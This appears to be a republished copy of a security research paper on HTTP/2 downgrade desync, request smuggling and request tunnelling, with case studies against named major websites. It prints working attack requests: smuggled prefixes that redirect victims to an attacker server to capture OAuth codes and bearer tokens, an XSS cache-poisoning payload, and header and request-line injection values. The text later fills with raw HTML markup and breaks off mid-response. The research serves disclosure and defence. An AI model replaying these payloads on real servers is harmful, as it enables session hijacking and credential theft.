HTTP/2: The Sequel is Always Worse

by Prapattimynk, Saturday, 23 September 2023 (8 months ago)
HTTP/2: The Sequel is Always Worse


HTTP/2 is easily mistaken for a transport-layer protocol that can be swapped in with zero security implications for the website behind it. In this paper, I’ll introduce multiple new classes of HTTP/2-exclusive threats caused by both implementation flaws and RFC imperfections.

I’ll start by showing how these flaws enable HTTP/2-exclusive desync attacks, with case studies targeting high-profile websites powered by servers ranging from Amazon’s Application Load Balancer to WAFs, CDNs, and bespoke stacks by big tech. These achieve critical impact by hijacking clients, poisoning caches, and stealing credentials to net multiple max-bounties.

After that, I’ll unveil novel techniques and tooling to crack open desync-powered request tunnelling – a widespread but overlooked request smuggling variant that is typically mistaken for a false positive. Finally, I’ll share multiple new exploit-primitives introduced by HTTP/2, exposing fresh server-layer and application-layer attack surface.

This research paper accompanies a presentation at Black Hat USA and DEF CON, and a recording will be embedded on this page shortly. It is also available as a printable whitepaper. This paper is focused entirely on the technical details – if you’d like extra insight into the research journey, please check out the presentation:

Outline

The first step to exploiting HTTP/2 is learning the protocol fundamentals. Fortunately, there’s less to learn than you might think.

I started this research by coding an HTTP/2 client from scratch, but I’ve concluded that for the attacks described in this paper, we can safely ignore the details of many lower-level features like frames and streams.

Although HTTP/2 is complex, it’s designed to transmit the same information as HTTP/1.1. Here’s an equivalent request represented in the two protocols.

HTTP/1.1:

POST /login HTTP/1.1rn
Host: psres.netrn
User-Agent: burprn
Content-Length: 9rn
rn
x=123&y=4

HTTP/2:

:methodPOST
:path/login
:authoritypsres.net
:schemehttps
user-agentburp
x=123&y=4

Assuming you’re already familiar with HTTP/1, there are only three new concepts that you need to understand.

Pseudo-Headers

In HTTP/1, the first line of the request contains the request method and path. HTTP/2 replaces the request line with a series of pseudo-headers. The five pseudo-headers are easy to recognize as they’re represented using a colon at the start of the name:

:method - The request method
:path - The request path. Note that this includes the query string
:authority - The Host header, roughly
:scheme - The request scheme, typically 'http' or 'https'
:status - The response status code - not used in requests

Binary Protocol

HTTP/1 is a text-based protocol, so requests are parsed using string operations. For example, a server needs to look for a colon in order to know when a header name ends. The potential for ambiguity in this approach is what makes desync attacks possible. HTTP/2 is a binary protocol like TCP, so parsing is based on predefined offsets and much less prone to ambiguity. This paper represents HTTP/2 requests using a human-readable abstraction rather than the actual bytes. For example, on the wire, pseudo-header names are actually mapped to a single byte – they don’t really contain a colon.

Message Length

In HTTP/1, the length of each message body is indicated via the Content-Length or Transfer-Encoding header.

In HTTP/2, those headers are redundant because each message body is composed of data frames which have a built-in length field. This means there’s little room for ambiguity about the length of a message, and might leave you wondering how desync attacks using HTTP/2 are possible. The answer is HTTP/2 downgrading.

HTTP/2 Desync Attacks

Request Smuggling via HTTP/2 Downgrades

HTTP/2 downgrading is when a front-end server speaks HTTP/2 with clients, but rewrites requests into HTTP/1.1 before forwarding them on to the back-end server. This protocol translation enables a range of attacks, including HTTP request smuggling:

Classic request smuggling vulnerabilities mostly occur because the front-end and back-end disagree about whether to derive a request’s length from its Content-Length (CL), or Transfer-Encoding (TE) header. Depending on which way around this desynchronization happens, the vulnerability is classified as CL.TE or TE.CL.

Front-ends speaking HTTP/2 almost always use HTTP/2’s built-in message length. However, the back-end receiving a downgraded request doesn’t have access to this data, and must use the CL or TE header. This leads to two main types of vulnerability: H2.TE and H2.CL.

Case Studies

We’ve now covered enough theory to start exploring some real vulnerabilities. To find these, I implemented automated detection in HTTP Request Smuggler, using an adapted version of the timeout-based H1-desync detection strategy. Once implemented, I used this to scan my pipeline of websites with bug-bounty programs. All the referenced vulnerabilities have been patched unless otherwise stated, and over 50% of the total bug-bounty earnings has been donated to local charities.

The following section assumes the reader is familiar with HTTP Request Smuggling. If you find any of the explanations are insufficient, I recommend reading or watching HTTP Desync Attacks: Request Smuggling Reborn, and tackling our Web Security Academy labs.

H2.CL Desync on Netflix

Thanks to HTTP/2’s data-frame length field, the Content-Length header is not required. However, the HTTP/2 RFC states that this header is permitted, provided it’s correct. For our first case study, we’ll target www.netflix.com, which used a front-end that performed HTTP downgrading without verifying the content-length. This enabled an H2.CL desync.

To exploit it, I issued the following HTTP/2 request:

:methodPOST
:path/n
:authoritywww.netflix.com
content-length4
abcdGET /n HTTP/1.1
Host: 02.rs?x.netflix.com
Foo: bar

After the front-end downgraded this request to HTTP/1.1, it hit the back-end looking something like:

POST /n HTTP/1.1
Host: www.netflix.com
Content-Length: 4

abcdGET /n HTTP/1.1
Host: 02.rs?x.netflix.com
Foo: bar

Thanks to the incorrect Content-Length, the back-end stopped processing the request early and the data in orange was treated as the start of another request. This enabled me to add an arbitrary prefix to the next request, regardless of who sent it.

I crafted the orange prefix to trigger a response redirecting the victim’s request to my server at 02.rs:

GET /anything HTTP/1.1
Host: www.netflix.com
HTTP/1.1 302 Found
Location: https://02.rs?x.netflix.com/n

By redirecting JavaScript includes, I could execute malicious JavaScript to compromise Netflix accounts, and steal passwords and credit card numbers. By running this attack in a loop I could gradually compromise all active users of the site, with no user-interaction. This severity is typical for request smuggling.

Netflix traced this vulnerability through Zuul back to Netty, and it’s now been patched and tracked as CVE-2021-21295. Netflix awarded their maximum bounty – $20,000.

H2.TE Desync on Application Load Balancer

Next up, let’s take a look at a straightforward H2.TE desync. The RFC states

any message containing connection-specific header fields MUST be treated as malformed

One connection-specific header field is Transfer-Encoding. Amazon Web Services’ (AWS) Application Load Balancer failed to obey this line, and accepted requests containing Transfer-Encoding. This meant that I could exploit almost every website using it, via an H2.TE desync.

One vulnerable website was Verizon’s law enforcement access portal, located at id.b2b.oath.com. I exploited it using the following request:

:methodPOST
:path/identitfy/XUI
:authorityid.b2b.oath.com
transfer-encodingchunked
0

GET /oops HTTP/1.1
Host: psres.net
Content-Length: 10

x=

The front-end downgraded this request into:

POST /identity/XUI HTTP/1.1
Host: id.b2b.oath.com
Content-Length: 66
Transfer-Encoding: chunked

0

GET /oops HTTP/1.1
Host: psres.net
Content-Length: 10

x=

This should look familiar – H2.TE exploitation is very similar to CL.TE. After downgrading, the ‘transfer-encoding: chunked’ header, which was conveniently ignored by the front-end server, takes priority over the frontend-inserted Content-Length. This made the back-end stop parsing the request body early and gave us the ability to redirect arbitrary users to my site at psres.net.

When I reported this, the triager requested further evidence that I could cause harm, so I started redirecting live users and quickly found that I was catching people in the middle of an OAuth login flow, helpfully leaking their secret code via the Referer header:

GET /b2blanding/show/oops HTTP/1.1
Host: psres.net
Referer: https://id.b2b.oath.com/?…&code=secret

Verizon awarded a $7,000 bounty for this finding.

I encountered a similar vulnerability with a different exploit path on accounts.athena.aol.com – the CMS powering various news sites including the Huffington Post and Engadget. Here, I could once again issue an HTTP/2 request that, after being downgraded, hit the back-end and injected a prefix that redirected victims to my domain:

POST /account/login HTTP/1.1
Host: accounts.athena.aol.com
Content-Length: 72
Transfer-Encoding: chunked

0

GET /account/1/logout?next=https://psres.net/ HTTP/1.1
X-Ignore: X

Once again, the triager wanted more evidence, so I took the opportunity to redirect some live users. This time, however, redirecting users resulted in a request to my server that effectively said “Can I have permission to send you my credentials?”:

OPTIONS / HTTP/1.1
Host: psres.net
Access-Control-Request-Headers: authorization

I hastily configured my server to grant them permission:

HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: authorization

And received a beautiful stream of creds:

GET / HTTP/1.1
Host: psres.net
Authorization: Bearer eyJhbGwiOiJIUzI1NiIsInR6cCI6Ik…

This showcased some interesting browser behavior I’ll need to explore later, and also netted another $10,000 from Verizon.

I also reported the root vulnerability directly to Amazon, who have now patched Application Load Balancer so their customers’ websites are no longer exposed to it. Unfortunately, they don’t have a research-friendly bug bounty program.

Every website using Imperva’s Cloud WAF was also vulnerable, continuing a long tradition of web application firewalls making websites easier to hack.

As HTTP/1 is a plaintext protocol, it’s impossible to put certain parsing-critical characters in certain places. For example, you can’t put a rn sequence in a header value – you’ll just end up terminating the header.

HTTP/2’s binary design, combined with the way it compresses headers, enables you to put arbitrary characters in arbitrary places. The server is expected to re-impose HTTP/1-style restrictions with an extra validation step:

Any request that contains a character not permitted in a header field value MUST be treated as malformed

Naturally, this validation step is skipped by many servers.

One vulnerable implementation was the Netlify CDN, which enabled H2.TE desync attacks on every website based on it, including Firefox’s start page at start.mozilla.org. I crafted an exploit that used ‘rn’ inside a header value:

:methodPOST
:path/
:authoritystart.mozilla.org
foobrn
transfer-encoding: chunked
0rn
rn
GET / HTTP/1.1rn
Host: evil-netlify-domainrn
Content-Length: 5rn
rn
x=

During the downgrade, the rn triggered a request header injection vulnerability, introducing an extra header: Transfer-Encoding: chunked

POST / HTTP/1.1rn
Host: start.mozilla.orgrn
Foo: brn
Transfer-Encoding: chunkedrn
Content-Length: 71rn
rn
0rn
rn
GET / HTTP/1.1rn
Host: evil-netlify-domainrn
Content-Length: 5rn
rn
x=

This triggered an H2.TE desync, with a prefix designed to make the victim receive malicious content from my own Netlify domain. Thanks to Netlify’s cache setup, the harmful response would be saved and persistently served to anyone else trying to access the same URL. In effect, I could take full control over every page on every site on the Netlify CDN. This was awarded with a total of $4,000.

H2.X via Request Splitting

Atlassian’s Jira looked like it had a similar vulnerability. I created a simple proof-of-concept intended to trigger two distinct responses – a normal one, and the robots.txt file. The actual result was something else entirely:

The server started sending me responses clearly intended for other Jira users, including a vast quantity of sensitive information and PII.

The root cause was a small optimization I’d made when crafting the payload. I’d decided that instead of using rn to smuggle a Transfer-Encoding header, it’d be better to use a double-rn to terminate the first request, letting me directly include my malicious prefix in the header:

:methodGET
:path/
:authorityecosystem.atlassian.net
foobar
Host: ecosystem.atlassian.net

GET /robots.txt HTTP/1.1
X-Ignore: x

This approach avoided the need for chunked encoding, a message body, and the POST method. However, it failed to account for a crucial step in the HTTP downgrade process – the front-end must terminate the headers with rnrn sequence. This led to it terminating the prefix, turning it into a complete standalone request:

GET / HTTP/1.1
Foo: bar
Host: ecosystem.atlassian.net

GET /robots.txt HTTP/1.1
X-Ignore: x
Host: ecosystem.atlassian.net
rn
rn

Instead of the back-end seeing 1.5 requests as usual, it saw exactly 2. I received the first response, but the next user received the response to my smuggled request. The response they should’ve received was then sent to the next user, and so on. In effect, the front-end started serving each user the response to the previous user’s request, indefinitely.

Req1 Resp1
Req2
Req3 Resp2
Req4 Resp3
Resp4

To make matters worse, some of these contained Set-Cookie headers that persistently logged users into other users’ accounts. After deploying a hotfix, Atlassian opted to globally expire all user sessions.

This potential impact is mentioned in Practical Attacks Using HTTP Request Smuggling by @defparam, but I think the prevalence is underestimated. For obvious reasons, I haven’t tried it on many live sites, but to my understanding this exploit path is nearly always possible. So, if you find a request smuggling vulnerability and the vendor won’t take it seriously without more evidence, smuggling exactly two requests should get them the evidence they’re looking for.

The front-end that made Jira vulnerable was PulseSecure Virtual Traffic Manager. Atlassian awarded $15,000 – triple their max bounty.

In addition to Netlify and PulseSecure Virtual Traffic Manager, this technique worked on a few other servers. Working with the Computer Emergency Response Team (CERT), we identified that F5’s Big-IP load balancers are vulnerable too – for further details refer to advisory K97045220. It also worked on Imperva Cloud WAF.

While waiting for PulseSecure’s patch, Atlassian tried out a few hotfixes. The first one disallowed newlines in header values, but failed to filter header names. This was easy to exploit as the server tolerated colons in header names – something else that’s impossible in HTTP/1.1:

:methodPOST
:path/
:authorityecosystem.atlassian.net
foo: bar
transfer-encoding
chunked


GET / HTTP/1.1
foo: bar
transfer-encoding
: chunked
host: ecosystem.atlassian.net

H2.TE via Request Line Injection

The initial hotfix also didn’t filter pseudo-headers, leading to a request line injection vulnerability. Exploitation of these is straightforward, just visualize where the injection is happening and ensure the resulting HTTP/1.1 request has a valid request line:

:methodGET / HTTP/1.1
Transfer-encoding: chunked
x: x
:path/ignored
:authorityecosystem.atlassian.net


GET / HTTP/1.1
transfer-encoding: chunked
x: x
/ignored HTTP/1.1
Host: eco.atlassian.net

The final flaw in the hotfix was the classic mistake of blocking ‘rn’ but not ‘n’ by itself – the latter is almost always sufficient for an exploit.

Desync-Powered Request Tunnelling

Next up, let’s take a look at something that’s less flashy, less obvious, but still dangerous. During this research, I noticed one subclass of desync vulnerability that has been largely overlooked due to lack of knowledge on how to confirm and exploit it. In this section, I’ll explore the theory behind it, then tackle these problems.

Whenever a front-end receives a request, it has to decide whether to route it down an existing connection to the back-end, or establish a new connection to the back-end. The connection-reuse strategy adopted by the front-end can have a major effect on which attacks you can successfully launch.

Most front-ends are happy to send any request down any connection, enabling the cross-user attacks we’ve already seen. However, sometimes, you’ll find that your prefix only influences requests coming from your own IP. This happens because the front-end is using a separate connection to the back-end for each client IP. It’s a bit of a nuisance, but you can often work around it by indirectly attacking other users via cache poisoning.

Some other front-ends enforce a one-to-one relationship between connections from the client, and connections to the back-end. This is an even stronger restriction, but regular cache poisoning and internal header leaking techniques still apply.

When a front-end opts to never reuse connections to the back-end, life gets really quite challenging. It’s impossible to send a request that directly affects a subsequent request:

This leaves one exploit primitive to work with: request tunnelling. This primitive can also arise from alternate means like H2C smuggling, but this section will be focused on desync-powered tunnelling.

Tunnelling Confirmation

Detecting request tunneling is easy – the usual timeout technique works fine. The first true challenge is confirming the vulnerability – you can confirm regular request smuggling vulnerabilities by sending a flurry of requests and seeing if an early request affects a later one. Unfortunately, this technique will always fail to confirm request tunnelling, making it extremely easy to mistake the vulnerability for a false positive.

We need a new confirmation technique. One obvious approach is to simply smuggle a complete request and see if you get two responses:

POST / HTTP/1.1
Host: example.com
Transfer-Encoding: chunked

0

GET / HTTP/1.1
Host: example.com

HTTP/1.1 301 Moved Permanently
Content-Length: 162
Location: /en

301 Moved…</p><p><span class="orangeCode">HTTP/1.1 301 Moved Permanently<br/>Content-Length: 162…</span></p><p></code></p><p>Unfortunately, the response shown here doesn’t actually tell us this server is vulnerable! Concatenating multiple responses is just how HTTP/1.1 keep-alive works, so we don’t know whether the front-end thinks it’s sending us one response (and is vulnerable) or two (and is secure).Fortunately, HTTP/2 neatly fixes this problem for us. If you see HTTP/1 headers in an HTTP/2 response body, you’ve just found yourself a desync:</p><p><span class="tg-wrap"></p><table class="tg"><tbody><tr><td class="tg-http2name">:method</td><td class="tg-http2value">POST</td></tr><tr><td class="tg-http2name">:path</td><td class="tg-http2value">/</td></tr><tr><td class="tg-http2name">:authority</td><td class="tg-http2value">example.com</td></tr><tr><td class="tg-http2name">transfer-encoding</td><td class="tg-http2value">chunked</td></tr><tr><td class="tg-http2response" colspan="2">0</p><p><span class="orangeCode">GET / HTTP/1.1<br/>Host: example.com</span></p></td></tr></tbody></table><p></span><br/><span class="tg-wrap"></p><table class="tg"><tbody><tr><td class="tg-http2name">:status</td><td class="tg-http2value">301</td></tr><tr><td class="tg-http2name">location</td><td class="tg-http2value">/en</td></tr><tr><td class="tg-http2response" colspan="2"><html><head><title>301 Moved…</p><p><span class="orangeHighlighter">HTTP/1.1 301 Moved Permanently<br/>Content-Length: 162…</span></p></td></tr></tbody></table><p></span></p><a name="tunnel-vision"></a><h4 id='16_tunnel-vision' id="vision">Tunnel Vision</h4><p>Thanks to a second problem, this approach doesn’t always work. The front-end server often uses the Content-Length on the back-end’s response to decide how many bytes to read from the socket. This means that even though you can make two requests hit the back-end, and trigger two responses from it, the front-end only passes you the first, less interesting response</p><p>In the following example, thanks to the highlighted Content-Length, the 403 response shown in orange is never delivered to the user:</p><p><code>POST /images/tiny.png HTTP/1.1<br/>Transfer-Encoding: chunked</p><p>0</p><p><span class="orangeCode">POST / HTTP/1.1<br/>…</span></p><p></code><code>HTTP/1.1 200 OK<br/><span class="yellowHighlighter">Content-Length: 7</span></p><p>content</p><p><span class="orangeCode">HTTP/1.1 403 <br/>…</span></p><p></code></p><p>Sometimes, persistence can substitute for insight. Bitbucket was vulnerable to blind tunnelling, and after repeated efforts over four months, I found a solution by blind luck. The endpoint was returning a response so large that it made Burp Repeater lag slightly, so I decided to shorten it by switching my method from POST to HEAD. This was effectively asking the server to return the response headers, but omit the response body:</p><p><code>HEAD /images/tiny.png HTTP/1.1<br/>Transfer-Encoding: chunked</p><p>0</p><p><span class="orangeCode">POST / HTTP/1.1<br/>...</span></p><p></code></p><p>Sure enough, this led to the back-end serving only the response headers… including the Content-Length header for the undelivered body! This made the front-end over-read and serve up part of the response to the second, smuggled request: </p><p><code>HTTP/1.1 200 OK<br/>Content-Length: 7</p><p><span class="orangeHighlighter">HTTP/1.</span><span class="orangeCode">1 403<br/>…</span></p><p></code></p><p>So, if you suspect a blind request tunnelling vulnerability, try HEAD and see what happens. Thanks to the timing-sensitive nature of socket reads, it might require a few attempts, and you’ll find it’s easier to read smuggled responses that get served quickly. This means that smuggling an invalid request is better for detection purposes:</p><p><code>HEAD / HTTP/1.1<br/>Transfer-Encoding: chunked</p><p>0</p><p>H A X</p><p></code></p><p>Smuggling an invalid request also makes the back-end close the connection, avoiding the possibility of accidental response queue poisoning. Note that if the target is only vulnerable to tunnelling, response queue poisoning isn’t possible so you don’t need to worry about that. Sometimes when HEAD fails, other methods like OPTIONS, POST or GET will work instead. I’ve added this technique to HTTP Request Smuggler as a detection method. </p><a name="tunnelling-exploitation-guessing-internal-headers"></a><h4 id='17_tunnelling-exploitation-guessing-internal-headers' id="guessing">Tunnelling Exploitation: Guessing Internal Headers</h4><p>Request tunnelling lets you hit the back-end with a request that is completely unprocessed by the front-end. The most obvious exploit path is to use this to bypass front-end security rules like path restrictions. However, you’ll often find there aren’t any relevant rules to bypass. Fortunately, there’s a second option.</p><p>Front-end servers often inject internal headers used for critical functions, such as specifying who the user is logged in as. Attempts to exploit these headers directly usually fail due to the front-end detecting and rewriting them. You can use request tunnelling to bypass this rewrite and successfully smuggle internal headers.</p><p>There’s one catch – internal headers are often invisible to attackers, and it’s hard to exploit a header you don’t know the name of. To help out, I’ve just released an update to <a rel="nofollow noopener" target="_blank" href="https://github.com/PortSwigger/param-miner">Param Miner</a> that adds support for guessing internal header names via request tunnelling. As long as the server’s internal header is in Param Miner’s wordlist, and causes a visible difference in the server’s response, Param Miner should detect it.</p><a name="tunnelling-exploitation-leaking-internal-headers"></a><h4 id='18_tunnelling-exploitation-leaking-internal-headers' id="leaking">Tunnelling Exploitation: Leaking Internal Headers</h4><p>Custom internal headers that are not present in Param Miner’s static wordlist or leaked in site traffic may evade detection. Regular request smuggling can be used to make the server leak its internal headers to the attacker, but this approach doesn’t work for request tunnelling.</p><p>Fortunately, if you can inject newlines in headers via HTTP/2, there’s another way to discover internal headers. Classic desync attacks rely on making the two servers disagree about where the body of a request ends, but with newlines we can instead cause disagreement about where the body starts! </p><p>To obtain the internal headers used by bitbucket, I issued the following request:</p><p><span class="tg-wrap"></p><table class="tg"><tbody><tr><td class="tg-http2name">:method</td><td class="tg-http2value">POST</td></tr><tr><td class="tg-http2name">:path</td><td class="tg-http2value">/blog</td></tr><tr><td class="tg-http2name">:authority</td><td class="tg-http2value">bitbucket.org</td></tr><tr><td class="tg-http2name">foo</td><td class="tg-http2value">bar<br/>Host: bitbucket.wpengine.com<br/>Content-Length: 200</p><p>s=cow</p></td></tr><tr><td class="tg-http2response" colspan="2">foo=bar</td></tr></tbody></table><p></span></p><p>After being downgraded, it looked something like:</p><p><code>POST /blog HTTP/1.1<br/><span class="orangeCode">Foo: bar<br/>Host: bitbucket.wpengine.com<br/>Content-Length: 200</p><p>s=cow</p><p></span><br/>SSLClientCipher: TLS_AES_128<br/>Host: bitbucket.wpengine.com<br/>Content-length: 7</p><p>foo=bar</p><p></code></p><p>Can you see what I’ve done here? Both the front-end and back-end think I’ve sent one request, but they get confused about where the body starts. The front-end thinks ‘s=cow’ is part of the headers, so it inserts the internal headers after that. This means the back-end ends up treating the internal headers as part of the ‘s’ POST parameter I’m sending to WordPress’ search function… and reflects them back:</p><p><code><title>You searched for cowSSLClientCipher: TLS_AES_128_GCM_SHA256, version=TLSv1.3, bits=128Host: bitbucket.wpengine.comSSLSessionID: X-Cluster-Client-IP: 81.132.48.250Connection: Keep-Alivecontent-length: 7</code></p><p>Hitting different paths on bitbucket.org lead to my request being routed to different back-ends, and leaking different headers:</p><p><span class="tg-wrap"></p><table class="tg"><tbody><tr><td class="tg-http2name">:method</td><td class="tg-http2value">PUT</td></tr><tr><td class="tg-http2name">:path</td><td class="tg-http2value">/!api/internal/snippets</td></tr><tr><td class="tg-http2name">:authority</td><td class="tg-http2value">bitbucket.org</td></tr></tbody></table><p></span><br/><code>...<br/>SSLClientCertStatus: NoClientCert<br/>X-Forwarded-For-Key: redacted-secret<br/>...</code></p><p>As we’re only triggering a single response from the back-end, this technique works even if the request tunnelling vulnerability is blind.</p><a name="tunnelling-exploitation-cache-poisoning"></a><h4 id='19_tunnelling-exploitation-cache-poisoning' id="cache">Tunnelling Exploitation: Cache Poisoning</h4><p>Finally, if the stars are aligned, you might be able to use tunnelling for an extra powerful variety of <a rel="nofollow noopener" target="_blank" href="https://portswigger.net/web-security/web-cache-poisoning">web cache poisoning</a>. You need a scenario where you’ve got request tunnelling via H2.X desync, the HEAD technique works, and there’s a cache present. This will let you use HEAD to poison the cache with harmful responses created by mixing and matching arbitrary headers and bodies. </p><p>After a little digging, I found that fetching /wp-admin triggered a redirect which reflected user input inside the Location header without encoding it. By itself, this is completely harmless – the Location header doesn’t need HTML encoding. However, by pairing it with response headers from /blog/404, I could trick browsers into rendering it, and executing arbitrary JavaScript:</p><p><span class="tg-wrap"></p><table class="tg"><tbody><tr><td class="tg-http2name">:method</td><td class="tg-http2value">HEAD</td></tr><tr><td class="tg-http2name">:path</td><td class="tg-http2value">/blog/?x=dontpoisoneveryone</td></tr><tr><td class="tg-http2name">:authority</td><td class="tg-http2value">bitbucket.org</td></tr><tr><td class="tg-http2name">foo</td><td class="tg-http2value">bar<br/>Host: x</p><p>GET /wp-admin?<svg/onload=alert(1)> HTTP/1.1<br/>Host: bitbucket.wpengine.com</p></td></tr></tbody></table><p></span><br/><code>HTTP/1.1 404 Not Found<br/><span class="yellowHighlighter">Content-Type: text/html</span><br/>X-Cache-Info: cached<br/>Content-Length: 5891</p><p>HTTP/1.1 301 Moved Permanently<br/>Location: https://bitbucket.org/wp-admin/?<span class="yellowHighlighter"><svg/onload=alert(1)></span></p><p></code></p><p>Using this technique, after six months of working on an apparently-useless vulnerability, I gained persistent control over every page on bitbucket.org</p><a name="http-2-exploit-primitives"></a><h2 id='20_http-2-exploit-primitives' id="primitives">HTTP/2 Exploit Primitives</h2><p>Next up, let’s take a look at some HTTP/2 exploit primitives. This section is light on full case-studies, but each of these is based on behavior I’ve observed on real websites, and will grant you some kind of foothold on the target.</p><a name="ambiguity-and-http-2"></a><h4 id='21_ambiguity-and-http-2' id="ambiguity">Ambiguity and HTTP/2</h4><p>In HTTP/1, duplicate headers are useful for a range of attacks, but it’s impossible to send a request with multiple methods or paths. HTTP/2’s decision to replace the request line with pseudo-headers means this is now possible. I’ve observed real servers that accept multiple :path headers, and server implementations are inconsistent in which :path they process:</p><p><span class="tg-wrap"></p><table class="tg"><tbody><tr><td class="tg-http2name">:method</td><td class="tg-http2value">GET</td></tr><tr><td class="tg-http2name">:path</td><td class="tg-http2value">/some-path</td></tr><tr><td class="tg-http2name">:path</td><td class="tg-http2value">/different-path</td></tr><tr><td class="tg-http2name">:authority</td><td class="tg-http2value">example.com</td></tr></tbody></table><p></span></p><p>Also, although HTTP/2 introduces the :authority header to replace the Host header, the Host header is technically still allowed. In fact, as I understand it, both are optional. This creates ample opportunity for Host-header attacks such as:</p><p><span class="tg-wrap"></p><table class="tg"><tbody><tr><td class="tg-http2name">:method</td><td class="tg-http2value">GET</td></tr><tr><td class="tg-http2name">:path</td><td class="tg-http2value">/</td></tr><tr><td class="tg-http2name">:authority</td><td class="tg-http2value">example.com</td></tr><tr><td class="tg-http2name">host</td><td class="tg-http2value">attacker.com</td></tr></tbody></table><p></span></p><a name="url-prefix-injection"></a><h4 id='22_url-prefix-injection' id="prefix">URL Prefix Injection</h4><p>Another HTTP/2 feature that it’d be amiss to overlook is the :scheme pseudo-header. The value of this is meant to be ‘http’ or ‘https’, but it supports arbitrary bytes.</p><p>Some systems, including Netlify, used it to construct a URL, without performing any validation. This lets you override the path and, in some cases, poison the cache:</p><p><span class="tg-wrap"></p><table class="tg"><tbody><tr><td class="tg-http2name">:method</td><td class="tg-http2value">GET</td></tr><tr><td class="tg-http2name">:path</td><td class="tg-http2value">/ffx36.js</td></tr><tr><td class="tg-http2name">:authority</td><td class="tg-http2value">start.mozilla.org</td></tr><tr><td class="tg-http2name">:scheme</td><td class="tg-http2value"><span class="orangeCode">http://start.mozilla.org/xyz?</span></td></tr></tbody></table><p></span><br/><code>HTTP/1.1 301 Moved Permanently<br/>Location: <span class="orangeCode">https://start.mozilla.org/xyz?</span>://start.mozilla.org/ffx36.js</code></p><p>Others use the scheme to build the URL to which the request is routed, creating an <a rel="nofollow noopener" target="_blank" href="https://portswigger.net/web-security/ssrf">SSRF vulnerability</a>.</p><p>Unlike the other techniques used in this paper, these exploits work even if the target isn’t doing HTTP/2 downgrading.</p><a name="header-name-splitting"></a><h4 id='23_header-name-splitting' id="namesplitting">Header Name Splitting</h4><p>You’ll find some servers don’t let you use newlines in header names, but do allow colons. This only rarely enables full desynchronization, due to the trailing colon appended during the downgrade:</p><p><span class="tg-wrap"></p><table class="tg"><tbody><tr><td class="tg-http2name">:method</td><td class="tg-http2value">GET</td></tr><tr><td class="tg-http2name">:path</td><td class="tg-http2value">/</td></tr><tr><td class="tg-http2name">:authority</td><td class="tg-http2value">redacted.net</td></tr><tr><td class="tg-http2name">transfer-encoding<span class="orangeHighlighter">: </span>chunked</td><td class="tg-http2value"><span class="orangeCode"/></td></tr></tbody></table><p></span><br/><code>GET / HTTP/1.1<br/>Host: redacted.net<br/>transfer-encoding<span class="orangeHighlighter">: </span>chunked<span class="yellowHighlighter">: </span></code></p><p>It’s better suited to Host-header attacks, since the Host is expected to contain a colon, and servers often ignore everything after the colon:</p><p><span class="tg-wrap"></p><table class="tg"><tbody><tr><td class="tg-http2name">:method</td><td class="tg-http2value">GET</td></tr><tr><td class="tg-http2name">:path</td><td class="tg-http2value">/</td></tr><tr><td class="tg-http2name">:authority</td><td class="tg-http2value">example.com</td></tr><tr><td class="tg-http2name">host<span class="orangeHighlighter">: </span>psres.net</td><td class="tg-http2value">443</td></tr></tbody></table><p></span><br/><code>GET / HTTP/1.1<br/>Host: example.com<br/>Host<span class="orangeHighlighter">: </span>psres.net<span class="yellowHighlighter">: </span>443</code></p><a name="request-line-injection"></a><h4 id='24_request-line-injection' id="request">Request Line Injection</h4><p>I did find one server where header-name splitting enabled a desync. Mid-testing, the vulnerability disappeared and the server banner reported that they’d updated their Apache front-end. In an attempt to track down the vulnerability, I installed the old version of Apache locally. I couldn’t replicate the issue, but I did discover something else. </p><p>Apache’s mod_proxy allows spaces in the :method, enabling request line injection. If the back-end server tolerates trailing junk in the request line, this lets you bypass block rules:</p><p><code><ProxyMatch "/admin"><br/>Deny from all</code><span class="tg-wrap"></p><table class="tg"><tbody><tr><td class="tg-http2name">:method</td><td class="tg-http2value"><span class="orangeCode">GET /admin HTTP/1.1</span></td></tr><tr><td class="tg-http2name">:path</td><td class="tg-http2value">/fakepath</td></tr><tr><td class="tg-http2name">:authority</td><td class="tg-http2value">psres.net</td></tr></tbody></table><p></span><br/><code><span class="orangeCode">GET /admin HTTP/1.1</span> /fakepath HTTP/1.1<br/>Host: internal-server</code></p><p>And escape subfolders:</p><p><code>ProxyPass http://internal-server.net:8080/public</code><span class="tg-wrap"></p><table class="tg"><tbody><tr><td class="tg-http2name">:method</td><td class="tg-http2value"><span class="orangeCode">GET / HTTP/1.1</span></td></tr><tr><td class="tg-http2name">:path</td><td class="tg-http2value">/fakepath </td></tr><tr><td class="tg-http2name">:authority</td><td class="tg-http2value">psres.net</td></tr></tbody></table><p></span><br/><code><span class="orangeCode">GET / HTTP/1.1</span> /public/fakepath HTTP/1.1<br/>Host: internal-server</code></p><p>I reported this to Apache on the 11th May, and they confirmed it within 24 hours, reserved CVE-2021-33193, and said this issue will be patched in 2.4.49. Unfortunately, at the time of this whitepaper being published – 86 days after Apache was notified of the vulnerability – 2.4.49 had not yet come out, so although there was a patch on master, this was effectively a zero-day. The <a rel="nofollow noopener" target="_blank" href="https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-33193">patched version</a> was subsequently released on the 16th September.</p><a name="header-tering-wrap"></a><h4 id='25_header-tering-wrap' id="wrap">Header Tampering Wrap</h4><p>HTTP/1.1 once had a lovely feature called line folding, where you were allowed to put a rn followed by a space in a header value, and the subsequent data would be ‘folded’ up. </p><p>Here’s an identical request sent normally:</p><p><code>GET / HTTP/1.1<br/>Host: example.com<br/>X-Long-Header: foo bar<br/>Connection: close</code></p><p>And using line folding:</p><p><code>GET / HTTP/1.1<br/>Host: example.com<br/>X-Long-Header: foo<br/> bar<br/>Connection: close</code></p><p>The feature was later deprecated, but plenty of servers still support it. </p><p>If you find a website with an HTTP/2 front-end that lets you send header names starting with a space, and a back-end that supports line-folding, you can tamper with other headers, including internal ones. Here’s an example where I’ve tampered with the internal header request-id, which is harmless, but helpfully reflected by the back-end:</p><p><span class="tg-wrap"></p><table class="tg"><tbody><tr><td class="tg-http2name">:method</td><td class="tg-http2value">GET</td></tr><tr><td class="tg-http2name">:path</td><td class="tg-http2value">/</td></tr><tr><td class="tg-http2name">:authority</td><td class="tg-http2value">redacted.net</td></tr><tr><td class="tg-http2name"><span class="orangeHighlighter"> </span>poison</td><td class="tg-http2value">x</td></tr><tr><td class="tg-http2name">user-agent</td><td class="tg-http2value">burp</td></tr></tbody></table><p></span><br/><code>GET / HTTP/1.1<br/>Host: redacted.net<br/>Request-Id: 1-602d2c4b-7c9a1f0f7<br/><span class="yellowHighlighter"> </span>poison: x<br/>User-Agent: burp<br/>…</code><code>HTTP/1.1 